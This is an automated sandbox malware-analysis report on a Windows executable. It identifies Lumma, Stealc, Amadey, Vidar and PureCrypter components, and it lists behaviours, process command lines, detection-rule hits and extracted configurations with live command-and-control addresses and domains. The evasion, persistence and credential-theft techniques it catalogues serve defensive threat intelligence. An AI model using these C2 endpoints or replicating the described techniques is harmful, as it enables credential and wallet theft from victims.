Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1552989
MD5:	38f7509d769058697f81ef17cfbe8c87
SHA1:	38e2634c714fccf57ea1d5b27188f2c77f86e2db
SHA256:	daf5ec940fde5a1df665a7240a0e27d3c39da5b62d4d1935579158fa2a095b00
Tags:	exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Detected PureCrypter Trojan

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 38F7509D769058697F81EF17CFBE8C87)

chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2172,i,10839052718167675908,6568144357530153640,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8000 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5712 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2284,i,16948042594527943735,4818117858943620130,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8664 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDHCAECGIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsDHCAECGIEB.exe (PID: 4676 cmdline: "C:\Users\user\DocumentsDHCAECGIEB.exe" MD5: 571952385750F4874BB235D9E5E61120)

skotes.exe (PID: 180 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 571952385750F4874BB235D9E5E61120)

msedge.exe (PID: 7216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7512 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6920 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8592 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6972 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6244 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 7264 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 571952385750F4874BB235D9E5E61120)

rundll32.exe (PID: 8264 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8236 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

6ca8f7e5e2.exe (PID: 8632 cmdline: "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe" MD5: AE39EF9A549CC7FEB4940602F7F9AF7C)

chrome.exe (PID: 2172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 9076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

9305c7ab92.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe" MD5: 38F7509D769058697F81EF17CFBE8C87)

skotes.exe (PID: 8024 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 571952385750F4874BB235D9E5E61120)

9fc857756c.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe" MD5: 954CC441DB8729CB9F76FDA40FE5B13A)

rundll32.exe (PID: 5308 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 5484 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8244 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 8924 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

6ca8f7e5e2.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe" MD5: AE39EF9A549CC7FEB4940602F7F9AF7C)

rundll32.exe (PID: 4764 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 6424 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

6ca8f7e5e2.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe" MD5: AE39EF9A549CC7FEB4940602F7F9AF7C)

9305c7ab92.exe (PID: 2968 cmdline: "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe" MD5: 38F7509D769058697F81EF17CFBE8C87)

9fc857756c.exe (PID: 6260 cmdline: "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe" MD5: 954CC441DB8729CB9F76FDA40FE5B13A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1005203011\clip.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000022.00000002.3041803841.00000000000D1000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3140028229.0000000001170000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000003.3184454599.0000000001170000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2020668907.00000000049C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000002.3385606032.0000000005F51000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000003.3001438574.0000000004A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3090456756.000000000116D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000003.3732193014.0000000008700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3112297595.000000000116D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2449462094.0000000000561000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2407206885.00000000005A1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.5401595733.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000003.3092537480.000000000116D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000003.3168770434.0000000001170000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002B.00000003.3361596097.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3328651914.00000000083E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002C.00000002.3467869264.00000000000D1000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.3116272066.000000000116F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.2487450348.0000000000AD1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000003.3168645780.0000000001170000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000002.3776899724.0000000006261000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001C.00000003.2952185414.00000000012F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000003.3138185002.000000000116F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002C.00000003.3378808453.0000000004A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 1868	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 1868	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 1868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 1868	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8632	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 9305c7ab92.exe PID: 3872	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9305c7ab92.exe PID: 3872	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 7720	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8104	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8104	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8104	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8104	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 6ca8f7e5e2.exe PID: 8104	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 9305c7ab92.exe PID: 2968	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9305c7ab92.exe PID: 2968	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author
30.2.rundll32.exe.6f6e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
39.2.rundll32.exe.6f6e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
25.2.rundll32.exe.6f6e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
33.2.rundll32.exe.6e0b0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
26.2.rundll32.exe.6e0b0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
35.2.6ca8f7e5e2.exe.59534a1.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
22.2.skotes.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.2.skotes.exe.ad0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
21.2.DocumentsDHCAECGIEB.exe.560000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: rundll32 C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\clip.dll

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1868, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 1848, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32 C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\clip.dll

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:55:14.499625+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.5	49730	TCP
2024-11-10T04:55:56.859150+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.5	50056	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T04:56:21.551602+0100	2028371	3	Unknown Traffic	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:23.468839+0100	2028371	3	Unknown Traffic	192.168.2.5	50139	188.114.97.3	443	TCP
